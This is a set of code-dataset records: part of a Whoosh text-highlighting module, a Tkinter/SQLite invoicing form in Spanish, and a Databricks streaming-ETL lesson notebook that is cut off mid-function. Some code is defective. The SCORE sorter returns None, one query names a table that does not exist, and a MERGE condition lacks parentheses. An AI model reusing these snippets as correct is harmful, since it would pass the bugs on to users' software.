1 < textlen and text[endchar + 1] in sentencechars:\n continue\n \n yield Fragment(frag, charsafter=0)\n frag = []\n first = None\n \n if frag:\n yield Fragment(frag)\n\n\nclass ContextFragmenter(object):\n \"\"\"Looks for matched terms and aggregates them with their surrounding\n context.\n \n This fragmenter only yields fragments that contain matched terms.\n \"\"\"\n \n def __init__(self, termset, maxchars=200, surround=20):\n \"\"\"\n :param termset: A collection (probably a set or frozenset) containing\n the terms you want to match to token.text attributes.\n :param maxchars: The maximum number of characters allowed in a\n fragment.\n :param surround: The number of extra characters of context to add both\n before the first matched term and after the last matched term.\n \"\"\"\n \n self.maxchars = maxchars\n self.charsbefore = self.charsafter = surround\n \n def __call__(self, text, tokens):\n maxchars = self.maxchars\n charsbefore = self.charsbefore\n charsafter = self.charsafter\n \n current = []\n currentlen = 0\n countdown = -1\n for t in tokens:\n if t.matched:\n countdown = charsafter\n \n current.append(t)\n \n length = t.endchar - t.startchar\n currentlen += length\n \n if countdown >= 0:\n countdown -= length\n \n if countdown < 0 or currentlen >= maxchars:\n yield Fragment(current)\n current = []\n currentlen = 0\n \n else:\n while current and currentlen > charsbefore:\n t = current.pop(0)\n currentlen -= t.endchar - t.startchar\n\n if countdown >= 0:\n yield Fragment(current)\n\n\n#class VectorFragmenter(object):\n# def __init__(self, termmap, maxchars=200, charsbefore=20, charsafter=20):\n# \"\"\"\n# :param termmap: A dictionary mapping the terms you're looking for to\n# lists of either (posn, startchar, endchar) or\n# (posn, startchar, endchar, boost) tuples.\n# :param maxchars: The maximum number of characters allowed in a fragment.\n# :param charsbefore: The number of extra characters of context to add before\n# the first matched 
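# A minimal usage sketch for the fragmenters above, combined with the
# highlight() helper defined at the bottom of this module. It assumes a
# whoosh analyzer that accepts chars=True/keeporiginal=True (whoosh's
# StandardAnalyzer does); the sample text and terms are illustrative:
#
#     from whoosh.analysis import StandardAnalyzer
#     text = "The quick brown fox jumps over the lazy dog."
#     excerpt = highlight(text, frozenset(["fox", "dog"]), StandardAnalyzer(),
#                         SimpleFragmenter(size=40), UppercaseFormatter())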
term.\n# :param charsafter: The number of extra characters of context to add after\n# the last matched term.\n# \"\"\"\n# \n# self.termmap = termmap\n# self.maxchars = maxchars\n# self.charsbefore = charsbefore\n# self.charsafter = charsafter\n# \n# def __call__(self, text, tokens):\n# maxchars = self.maxchars\n# charsbefore = self.charsbefore\n# charsafter = self.charsafter\n# textlen = len(text)\n# \n# vfrags = []\n# for term, data in self.termmap.iteritems():\n# if len(data) == 3:\n# t = Token(startchar = data[1], endchar = data[2])\n# elif len(data) == 4:\n# t = Token(startchar = data[1], endchar = data[2], boost = data[3])\n# else:\n# raise ValueError(repr(data))\n# \n# newfrag = VFragment([t], charsbefore, charsafter, textlen)\n# added = False\n# \n# for vf in vfrags:\n# if vf.overlaps(newfrag) and vf.overlapped_length(newfrag) < maxchars:\n# vf.merge(newfrag)\n# added = True\n# break\n\n\n# Fragment scorers\n\ndef BasicFragmentScorer(f):\n # Add up the boosts for the matched terms in this passage\n score = sum(t.boost for t in f.matches)\n \n # Favor diversity: multiply score by the number of separate\n # terms matched\n score *= len(f.matched_terms) * 100\n \n return score\n\n\n# Fragment sorters\n\ndef SCORE(fragment):\n \"Sorts higher scored passages first.\"\n return None\ndef FIRST(fragment):\n \"Sorts passages from earlier in the document first.\"\n return fragment.startchar\ndef LONGER(fragment):\n \"Sorts longer passages first.\"\n return 0 - len(fragment)\ndef SHORTER(fragment):\n \"Sort shorter passages first.\"\n return len(fragment)\n\n\n# Formatters\n\nclass UppercaseFormatter(object):\n \"\"\"Returns a string in which the matched terms are in UPPERCASE.\n \"\"\"\n \n def __init__(self, between=\"...\"):\n \"\"\"\n :param between: the text to add between fragments.\n \"\"\"\n \n self.between = between\n \n def _format_fragment(self, text, fragment):\n output = []\n index = fragment.startchar\n \n for t in fragment.matches:\n if t.startchar > index:\n output.append(text[index:t.startchar])\n \n ttxt = text[t.startchar:t.endchar]\n if t.matched: ttxt = ttxt.upper()\n output.append(ttxt)\n index = t.endchar\n \n output.append(text[index:fragment.endchar])\n return \"\".join(output)\n\n def __call__(self, text, fragments):\n return self.between.join((self._format_fragment(text, fragment)\n for fragment in fragments))\n\n\nclass HtmlFormatter(object):\n \"\"\"Returns a string containing HTML formatting around the matched terms.\n \n This formatter wraps matched terms in an HTML element with two class names.\n The first class name (set with the constructor argument ``classname``) is\n the same for each match. The second class name (set with the constructor\n argument ``termclass`` is different depending on which term matched. This\n allows you to give different formatting (for example, different background\n colors) to the different terms in the excerpt.\n \n >>> hf = HtmlFormatter(tagname=\"span\", classname=\"match\", termclass=\"term\")\n >>> hf(mytext, myfragments)\n \"The template geometry is...\"\n \n This object maintains a dictionary mapping terms to HTML class names (e.g.\n ``term0`` and ``term1`` above), so that multiple excerpts will use the same\n class for the same term. 
If you want to re-use the same HtmlFormatter\n object with different searches, you should call HtmlFormatter.clear()\n between searches to clear the mapping.\n \"\"\"\n \n template = '<%(tag)s class=%(q)s%(cls)s%(tn)s%(q)s>%(t)s</%(tag)s>'\n \n def __init__(self, tagname=\"strong\", between=\"...\",\n classname=\"match\", termclass=\"term\", maxclasses=5,\n attrquote='\"'):\n \"\"\"\n :param tagname: the tag to wrap around matching terms.\n :param between: the text to add between fragments.\n :param classname: the class name to add to the elements wrapped around\n matching terms.\n :param termclass: the class name prefix for the second class which is\n different for each matched term.\n :param maxclasses: the maximum number of term classes to produce. This\n limits the number of classes you have to define in CSS by recycling\n term class names. For example, if you set maxclasses to 3 and have\n 5 terms, the 5 terms will use the CSS classes ``term0``, ``term1``,\n ``term2``, ``term0``, ``term1``.\n \"\"\"\n \n self.between = between\n self.tagname = tagname\n self.classname = classname\n self.termclass = termclass\n self.attrquote = attrquote\n self.maxclasses = maxclasses\n self.seen = {}\n \n def _format_fragment(self, text, fragment, seen):\n htmlclass = \" \".join((self.classname, self.termclass))\n \n output = []\n index = fragment.startchar\n \n for t in fragment.matches:\n if t.startchar > index:\n output.append(text[index:t.startchar])\n \n ttxt = htmlescape(text[t.startchar:t.endchar])\n if t.matched:\n if t.text in seen:\n termnum = seen[t.text]\n else:\n termnum = len(seen) % self.maxclasses\n seen[t.text] = termnum\n ttxt = self.template % {\"tag\": self.tagname,\n \"q\": self.attrquote,\n \"cls\": htmlclass,\n \"t\": ttxt, \"tn\": termnum}\n output.append(ttxt)\n index = t.endchar\n \n if index < fragment.endchar:\n output.append(text[index:fragment.endchar])\n \n return \"\".join(output)\n \n def __call__(self, text, fragments):\n seen = self.seen\n return self.between.join(self._format_fragment(text, fragment, seen)\n for fragment in fragments)\n \n def clear(self):\n \"\"\"Clears the dictionary mapping terms to HTML classnames.\n \"\"\"\n self.seen = {}\n\n\nclass GenshiFormatter(object):\n \"\"\"Returns a Genshi event stream containing HTML formatting around the\n matched terms.\n \"\"\"\n \n def __init__(self, qname=\"strong\", between=\"...\"):\n \"\"\"\n :param qname: the QName for the tag to wrap around matched terms.\n :param between: the text to add between fragments.\n \"\"\"\n \n self.qname = qname\n self.between = between\n \n from genshi.core import START, END, TEXT, Attrs, Stream #@UnresolvedImport\n self.START, self.END, self.TEXT = START, END, TEXT\n self.Attrs, self.Stream = Attrs, Stream\n\n def _add_text(self, text, output):\n if output and output[-1][0] == self.TEXT:\n output[-1] = (self.TEXT, output[-1][1] + text, output[-1][2])\n else:\n output.append((self.TEXT, text, (None, -1, -1)))\n\n def _format_fragment(self, text, fragment):\n START, TEXT, END, Attrs = self.START, self.TEXT, self.END, self.Attrs\n qname = self.qname\n output = []\n \n index = fragment.startchar\n lastmatched = False\n for t in fragment.matches:\n if t.startchar > index:\n if lastmatched:\n output.append((END, qname, (None, -1, -1)))\n lastmatched = False\n self._add_text(text[index:t.startchar], output)\n \n ttxt = text[t.startchar:t.endchar]\n if not lastmatched:\n output.append((START, (qname, Attrs()), (None, -1, -1)))\n lastmatched = True\n output.append((TEXT, ttxt, (None, -1, -1)))\n 
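# Note on the term-class recycling in HtmlFormatter above: classes are assigned
# as len(seen) % maxclasses, so with maxclasses=3 four distinct terms receive
# term0, term1, term2, term0, and the shared `seen` dict keeps the mapping
# stable across excerpts until clear() is called.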
\n index = t.endchar\n \n if lastmatched:\n output.append((END, qname, (None, -1, -1)))\n \n return output\n\n def __call__(self, text, fragments):\n output = []\n first = True\n for fragment in fragments:\n if not first:\n self._add_text(self.between, output)\n first = False\n output += self._format_fragment(text, fragment)\n \n return self.Stream(output)\n\n\n# Highlighting\n\ndef top_fragments(text, terms, analyzer, fragmenter, top=3,\n scorer=BasicFragmentScorer, minscore=1):\n termset = frozenset(terms)\n tokens = copyandmatchfilter(termset, analyzer(text, chars=True,\n keeporiginal=True))\n scored_frags = nlargest(top, ((scorer(f), f)\n for f in fragmenter(text, tokens)))\n return [sf for score, sf in scored_frags if score > minscore]\n\n\ndef highlight(text, terms, analyzer, fragmenter, formatter, top=3,\n scorer=BasicFragmentScorer, minscore=1,\n order=FIRST):\n \n fragments = top_fragments(text, terms, analyzer, fragmenter,\n top=top, minscore=minscore)\n fragments.sort(key=order)\n return formatter(text, fragments)\n \n\nif __name__ == '__main__':\n pass\n\n\n\n\n","repo_name":"Alfanous-team/alfanous","sub_path":"src/alfanous/Support/whoosh/highlight.py","file_name":"highlight.py","file_ext":"py","file_size_in_byte":16930,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"37"} +{"seq_id":"27418826500","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\nfrom tkinter.messagebox import *\nfrom tkinter import Tk, Button\nfrom Facturas import imprimirFactura\n\ndef actualizarClientes(event):\n cliente = clientes.current()\n\ndef actualizarProveedores(event):\n proveedor = proveedores.current()\n\ndef actualizarProductos(event):\n producto = Nombreproductos.current()\n\ndef actualizarPrecioProductos(event):\n precioProducto = Precioproductos.current()\n\ndef guardar():\n connection = sqlite3.connect('base.db')\n cursor = connection.cursor()\n\n id = codFactura.get()\n cliente = clientes.get()\n proveedor = proveedores.get()\n producto = Nombreproductos.get()\n precio = Precioproductos.get()\n\n try:\n cursor.execute('''\n CREATE TABLE IF NOT EXISTS generar_facturas (\n id INTEGER PRIMARY KEY AUTOINCREMENT, \n cliente VARCHAR(60) NOT NULL, \n proveedor VARCHAR(60) NOT NULL, \n nombre_producto VARCHAR(60) NOT NULL,\n precio_producto VARCHAR(60) NOT NULL)\n ''')\n print(\"Tabla creada correctamente\")\n except sqlite3.OperationalError as error:\n print(\"Error al abrir: \", error)\n\n registro = \"INSERT INTO generar_facturas (cliente, proveedor, nombre_producto, precio_producto) VALUES(?, ?, ?, ?)\"\n cursor.execute(registro, [cliente, proveedor, producto, precio])\n connection.commit()\n\n tabla.delete(*tabla.get_children())\n\n cursor.execute(\"SELECT * FROM generar_facturas\")\n\n i = 0\n for a in cursor:\n tabla.insert(\"\", i, text=\"\", values=(a[0], a[1], a[2], a[3], a[4]))\n i += 1\n tabla.place(x=450, y=450)\n\n mostrar()\n continuar()\n\n\ndef mostrar():\n try:\n botonGuardar['state'] = 'disabled'\n conexion = sqlite3.connect(\"base.db\")\n cursor = conexion.cursor()\n registro = \"SELECT * FROM generar_factura;\"\n cursor.execute(registro)\n factura = cursor.fetchall()\n print(factura)\n\n except sqlite3.OperationalError as error:\n print(\"Error al abrir:\", error)\n\n\ndef continuar():\n dato = tk.messagebox.askyesno(message=\"¿Desea continuar?\", title=\"Título\", parent=marco)\n if dato == True:\n botonGuardar['state'] = 'normal'\n codFactura.delete(0, 'end')\n clientes.delete(0, 'end')\n proveedores.delete(0, 
'end')\n Nombreproductos.delete(0, 'end')\n Precioproductos.delete(0, 'end')\n elif dato == False:\n marco.destroy()\n\nglobal codigoSeleccionado\ncodigoSeleccionado = None\nglobal datosFactura\n\ndef onSelected(evnt):\n for a in tabla.selection():\n item = tabla.item(a)\n cod, cli, prov, prod, prec = item[\"values\"][0:5]\n global codigoSeleccionado\n codigoSeleccionado = cod\n global datosFactura\n datosFactura = []\n datosFactura.append(cli)\n datosFactura.append(prov)\n datosFactura.append(prod)\n datosFactura.append(prec)\n print(len(datosFactura))\n\ndef accionboton():\n if (codigoSeleccionado == None):\n tk.messagebox.showerror(message=\"Debes seleccionar una factura en la tabla\", title=\"Error\", parent=marco)\n else:\n tk.messagebox.showinfo(message=f'Factura nº{codigoSeleccionado} impresa', title=\"Info\", parent=marco)\n imprimirFactura(codigoSeleccionado, datosFactura)\n\ndef creacionFacturas():\n connection = sqlite3.connect('base.db')\n cursor = connection.cursor()\n\n global marco\n marco = tk.Tk()\n marco.title(\"Generar Facturas\")\n marco.state('zoomed')\n marco.config(bg=\"yellow\")\n marco.grid_propagate(0)\n marco.iconbitmap(\"icono.ico\")\n\n etiqueta0 = tk.Label(marco, text=\" GENERAR FACTURAS \", bg=\"blue\", font =(\"Bahnschrift\",12)).grid(row=0, column=1, sticky=\"w\", padx=10, pady=10)\n\n espacio1 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=1, column=0, sticky=\"w\",padx=10, pady=10)\n espacio2 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=2, column=0, sticky=\"w\", padx=10, pady=10)\n espacio3 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=3, column=0, sticky=\"w\", padx=10, pady=10)\n espacio4 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=4, column=0, sticky=\"w\", padx=10, pady=10)\n\n etiqueta1 = tk.Label(marco, text=\"Código de la factura\", bg=\"blue\", font=(\"Bahnschrift\",12)).grid(row=5, column=0, sticky=\"w\", padx=10, pady=10)\n global codFactura\n codFactura = ttk.Entry(marco)\n codFactura.grid(row=5, column=1, sticky=\"w\", padx=10, pady=10)\n codFactura['state'] = 'disabled'\n\n etiqueta3 = tk.Label(marco, text=\"Clientes\", bg=\"blue\", font=(\"Bahnschrift\",12)).grid(row=7, column=0, sticky=\"w\", padx=10, pady=10)\n global clientes\n clientes = ttk.Combobox(marco)\n\n clientes['values'] = cursor.execute(\"SELECT nombre FROM clientes\").fetchall()\n clientes.grid(row=7, column=1, sticky=\"w\", padx=10, pady=10)\n clientes.bind('<<ComboboxSelected>>', actualizarClientes)\n\n etiqueta4 = tk.Label(marco, text=\"Proveedores\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=8, column=0, sticky=\"w\",padx=10, pady=10)\n global proveedores\n proveedores = ttk.Combobox(marco)\n proveedores['values'] = cursor.execute(\"SELECT nombre FROM proveedores\").fetchall()\n proveedores.grid(row=8, column=1, sticky=\"w\", padx=10, pady=10)\n proveedores.bind('<<ComboboxSelected>>', actualizarProveedores)\n\n etiqueta4 = tk.Label(marco, text=\"Nombre del producto\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=9, column=0,sticky=\"w\", padx=10,pady=10)\n global Nombreproductos\n Nombreproductos = ttk.Combobox(marco)\n Nombreproductos['values'] = cursor.execute(\"SELECT nombre FROM productos\").fetchall()\n Nombreproductos.grid(row=9, column=1, sticky=\"w\", padx=10, pady=10)\n Nombreproductos.bind('<<ComboboxSelected>>', actualizarProductos)\n\n etiqueta5 = tk.Label(marco, text=\"Precio del producto\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=10, column=0,sticky=\"w\",padx=10, pady=10)\n global Precioproductos\n Precioproductos = ttk.Combobox(marco)\n 
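    # Note: cursor.fetchall() returns one tuple per row, so the comboboxes
    # above will display entries like "('Ana',)". Flattening the rows first
    # gives clean values, e.g.:
    #     clientes['values'] = [row[0] for row in cursor.execute("SELECT nombre FROM clientes").fetchall()]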
Precioproductos['values'] = (10,20,30,40,50)\n Precioproductos.grid(row=10, column=1, sticky=\"w\", padx=10, pady=10)\n Precioproductos.bind('<<ComboboxSelected>>', actualizarPrecioProductos)\n\n global tabla\n tabla = ttk.Treeview(marco,\n columns=(\"id\", \"cliente\", \"proveedor\",\"nombre_producto\", \"precio_producto\"))\n tabla[\"show\"] = \"headings\"\n tabla.column(\"#0\")\n tabla.column(\"id\", width=150, anchor=tk.CENTER)\n tabla.column(\"cliente\", width=150, anchor=tk.CENTER)\n tabla.column(\"proveedor\", width=150, anchor=tk.CENTER)\n tabla.column(\"nombre_producto\", width=150, anchor=tk.CENTER)\n tabla.column(\"precio_producto\", width=150, anchor=tk.CENTER)\n\n tabla.heading(\"id\", text=\"id\", anchor=tk.CENTER)\n tabla.heading(\"cliente\", text=\"cliente\", anchor=tk.CENTER)\n tabla.heading(\"proveedor\", text=\"proveedor\", anchor=tk.CENTER)\n tabla.heading(\"nombre_producto\", text=\"nombre_producto\", anchor=tk.CENTER)\n tabla.heading(\"precio_producto\", text=\"precio_producto\", anchor=tk.CENTER)\n\n conexion = sqlite3.connect('base.db')\n cursor = conexion.cursor()\n cursor.execute(\"SELECT * FROM generar_facturas\")\n\n i = 0\n for a in cursor:\n tabla.insert(\"\", i, text=\"\", values=(a[0], a[1], a[2], a[3], a[4]))\n i += 1\n tabla.bind(\"<<TreeviewSelect>>\", onSelected)\n tabla.place(x=450, y=450)\n\n\n global botonGuardar\n botonGuardar = Button(marco)\n botonGuardar.config(text=\"GUARDAR\", width=10, height=2, anchor=\"center\", activebackground=\"blue\", relief=\"raised\",\n borderwidth=5, font=(\"Banschrift\", 11), command=lambda: guardar())\n botonGuardar.grid(row=13, column=1, sticky=\"w\", padx=100, pady=100)\n\n global botonImprimir\n botonImprimir = Button(marco)\n botonImprimir.config(text=\"IMPRIMIR FACTURA\", width=10, height=2, anchor=\"center\",\n activebackground=\"blue\", relief=\"raised\",\n borderwidth=5, font=(\"Bahnschrift\", 11), command=lambda: accionboton())\n botonImprimir.place(x=700, y=680, width=200)","repo_name":"InigoCG/Python_Facturacion","sub_path":"generarFactura.py","file_name":"generarFactura.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20142997891","text":"# Databricks notebook source\n# MAGIC %md-sandbox\n# MAGIC \n# MAGIC <div>
\n# MAGIC \"Databricks\n# MAGIC
\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Streaming Design Patterns\n# MAGIC \n# MAGIC The Lakehouse has been designed from the beginning to work seamlessly with datasets that grow infinitely over time. While Spark Structured Streaming is often positioned as a near real-time data processing solution, it combines with Delta Lake to also provide easy batch processing of incremental data while drastically simplifying the overhead required to track data changes over time.\n# MAGIC \n# MAGIC ## Learning Objectives\n# MAGIC By the end of this lesson, students will be able to:\n# MAGIC - Use Structured Streaming to complete simple incremental ETL\n# MAGIC - Perform incremental writes to multiple tables\n# MAGIC - Incrementally update values in a key-value store\n# MAGIC - Process Change Data Capture (CDC) data into Delta Tables using `MERGE`\n# MAGIC - Join two incremental tables\n# MAGIC - Join incremental and batch tables\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Run the following script to set up necessary variables and clear out past runs of this notebook.\n\n# COMMAND ----------\n\n# MAGIC %run ../Includes/sql-setup $course=\"stream_design\" $mode=\"reset\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that because Structured Streaming will be used throughout this lesson, checkpoint directories will need to be specified for each of our different streaming queries.\n# MAGIC \n# MAGIC The code below declares the checkpoints used throughout the lesson, and does a recursive delete to remove any state information from previous runs.\n\n# COMMAND ----------\n\ncheckpointPath = userhome + \"/_checkpoints/\"\nsilverCheckpoint = checkpointPath + \"silver/\"\nsplitStreamCheckpoint = checkpointPath + \"split_stream/\"\nkeyValueCheckpoint = checkpointPath + \"key_value/\"\nsilverStatusCheckpoint = checkpointPath + \"silver_status/\"\njoinedCheckpoint = checkpointPath + \"joined/\"\njoinStatusCheckpoint = checkpointPath + \"join_status/\"\n\ndbutils.fs.rm(checkpointPath, True)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Simple Incremental ETL\n# MAGIC \n# MAGIC The highest-volume workload at most organizations can largely be described as moving data from one location to another while applying light transformations and validations. Because most source data continues to grow as time passes, it's appropriate to refer to this data as incremental (sometimes also referred to as streaming data). Structured Streaming and Delta Lake make incremental ETL easy. 
\n# MAGIC \n# MAGIC Below we'll create a simple table and insert some values.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC CREATE TABLE bronze \n# MAGIC (id INT, name STRING, value DOUBLE); \n# MAGIC \n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (1, \"Yve\", 1.0),\n# MAGIC (2, \"Omar\", 2.5),\n# MAGIC (3, \"Elia\", 3.3)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The following cell defines an incremental read on the table just created using Structured Streaming, adds a field to capture when the record was processed, and writes out to a new table as a single batch.\n\n# COMMAND ----------\n\ndef update_silver():\n spark.readStream.table(\"bronze\").withColumn(\"processed_time\", F.current_timestamp()).writeStream.option(\"checkpointLocation\", silverCheckpoint).trigger(once=True).table(\"silver\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that while this code uses Structured Streaming, it's appropriate to think of this as a triggered batch processing incremental changes.\n\n# COMMAND ----------\n\nupdate_silver()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As expected, the stream runs for a very brief time, and the `silver` table written contains all the values previously written to `bronze`.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Processing new records is as easy as adding them to our source table `bronze`...\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (4, \"Ted\", 4.7),\n# MAGIC (5, \"Tiffany\", 5.5),\n# MAGIC (6, \"Vini\", 6.3)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ... and re-executing the incremental batch processing code.\n\n# COMMAND ----------\n\nupdate_silver()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Delta Lake is ideally suited for easily tracking and propagating inserted data through a series of tables. This pattern has a number of names, including \"medallion\", \"multi-hop\", \"Delta\", and \"bronze/silver/gold\" architecture.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Writing to Multiple Tables\n# MAGIC \n# MAGIC Those familiar with Structured Streaming may be aware that the `foreachBatch` method provides the option to execute custom data writing logic on each microbatch of streaming data.\n# MAGIC \n# MAGIC New DBR functionality provides guarantees that these writes will be idempotent, even when writing to multiple tables. 
This is especially useful when data for multiple tables might be contained within a single record.\n# MAGIC \n# MAGIC The code below first defines the custom writer logic to append records to two new tables, and then demonstrates using this function within `foreachBatch`.\n\n# COMMAND ----------\n\ndef write_twice(microBatchDF, batchId):\n appId = 'write_twice'\n \n microBatchDF.select(\"id\", \"name\", F.current_timestamp().alias(\"processed_time\")).write.option(\"txnVersion\", batchId).option(\"txnAppId\", appId).mode(\"append\").saveAsTable(\"silver_name\")\n \n microBatchDF.select(\"id\", \"value\", F.current_timestamp().alias(\"processed_time\")).write.option(\"txnVersion\", batchId).option(\"txnAppId\", appId).mode(\"append\").saveAsTable(\"silver_value\")\n\n\ndef split_stream():\n (spark.readStream.table(\"bronze\")\n .writeStream\n .foreachBatch(write_twice)\n .outputMode(\"update\")\n .option(\"checkpointLocation\", splitStreamCheckpoint)\n .trigger(once=True)\n .start())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that while a stream will again be triggered, the two writes contained within the `write_twice` function are using Spark batch syntax. This will always be the case for writers called by `foreachBatch`.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The cells below demonstrate the logic was applied properly to split the initial data into two tables.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_name\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that the `processed_time` for each of these tables differs slightly. The logic defined above captures the current timestamp at the time each write executes, demonstrating that while both writes happen within the same streaming microbatch process, they are fully independent transactions (as such, downstream logic should be tolerant for slightly asynchronous updates).\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Insert more values into the `bronze` table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (7, \"Viktor\", 7.4),\n# MAGIC (8, \"Hiro\", 8.2),\n# MAGIC (9, \"Shana\", 9.9)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC And we can now pick up these new records and write to two tables.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As expected, only new values are inserted into the two tables, again a few moments apart.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_name\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Update Aggregates in a Key-Value Store\n# MAGIC \n# MAGIC Incremental aggregation can be useful for a number of purposes, including dashboarding and enriching reports with current summary data.\n# MAGIC \n# MAGIC The logic below defines a handful of aggregations against the `silver` table.\n\n# COMMAND ----------\n\ndef update_key_value():\n (spark.readStream\n .table(\"silver\")\n .groupBy(\"id\")\n .agg(F.sum(\"value\").alias(\"total_value\"), \n F.mean(\"value\").alias(\"avg_value\"),\n F.count(\"value\").alias(\"record_count\"))\n .writeStream\n .option(\"checkpointLocation\", keyValueCheckpoint)\n .outputMode(\"complete\")\n .trigger(once=True)\n .table(\"key_value\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **NOTE**: Because the transformations above require 
shuffling data, setting the number of partitions to map to the cores in our streaming cluster will provide more efficient performance. (If the cluster size will be scaled up for production, the maximum number of cores that will be present in the cluster should be used when configuring this setting.)\n\n# COMMAND ----------\n\nspark.conf.set(\"spark.sql.shuffle.partitions\", 4)\n\n# COMMAND ----------\n\nupdate_key_value()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM key_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Adding more values to the `silver` table will allow more interesting aggregation.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO silver\n# MAGIC VALUES (1, \"Yve\", 1.0, current_timestamp()),\n# MAGIC (2, \"Omar\", 2.5, current_timestamp()),\n# MAGIC (3, \"Elia\", 3.3, current_timestamp()),\n# MAGIC (7, \"Viktor\", 7.4, current_timestamp()),\n# MAGIC (8, \"Hiro\", 8.2, current_timestamp()),\n# MAGIC (9, \"Shana\", 9.9, current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC One thing to note is that the logic being executed is currently overwriting the resulting table with each write. In the next section, `MERGE` will be used in combination with `foreachBatch` to update existing records. This pattern can also be applied with key-value stores.\n\n# COMMAND ----------\n\nupdate_key_value()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM key_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Processing Change Data Capture Data\n# MAGIC While the change data capture (CDC) data emitted by various systems will vary greatly, incrementally processing these data with Databricks is straightforward.\n# MAGIC \n# MAGIC Here the `bronze_status` table will represent the raw CDC information, rather than row-level data.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE TABLE bronze_status \n# MAGIC (user_id INT, status STRING, update_type STRING, processed_timestamp TIMESTAMP);\n# MAGIC \n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (1, \"new\", \"insert\", current_timestamp()),\n# MAGIC (2, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (3, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (4, \"churned\", \"update\", current_timestamp()),\n# MAGIC (5, null, \"delete\", current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The `silver_status` table below has been created to track the current `status` for a given `user_id`.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE TABLE silver_status (user_id INT, status STRING, updated_timestamp TIMESTAMP)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The `MERGE` statement can easily be written with SQL to apply CDC changes appropriately, given the type of update received.\n# MAGIC \n# MAGIC The rest of the `upsert_cdc` method contains the logic necessary to run SQL code against a micro-batch in a PySpark DataStreamWriter.\n\n# COMMAND ----------\n\ndef upsert_cdc(microBatchDF, batchID):\n microBatchDF.createTempView(\"bronze_batch\")\n \n query = \"\"\"\n MERGE INTO silver_status s\n USING bronze_batch b\n ON b.user_id = s.user_id\n WHEN MATCHED AND b.update_type = \"update\"\n THEN UPDATE SET user_id=b.user_id, status=b.status, updated_timestamp=b.processed_timestamp\n WHEN MATCHED AND b.update_type = \"delete\"\n THEN DELETE\n WHEN NOT MATCHED AND b.update_type = \"update\" OR b.update_type = \"insert\"\n THEN INSERT (user_id, status, updated_timestamp)\n VALUES (b.user_id, b.status, b.processed_timestamp)\n \"\"\"\n \n 
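    # The session that owns this micro-batch (and its temp view) may differ
    # from the notebook's global `spark` session, so the MERGE is executed
    # through the DataFrame's own session via its JVM handle below; Spark 3.1+
    # also exposes this more directly as microBatchDF.sparkSession.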
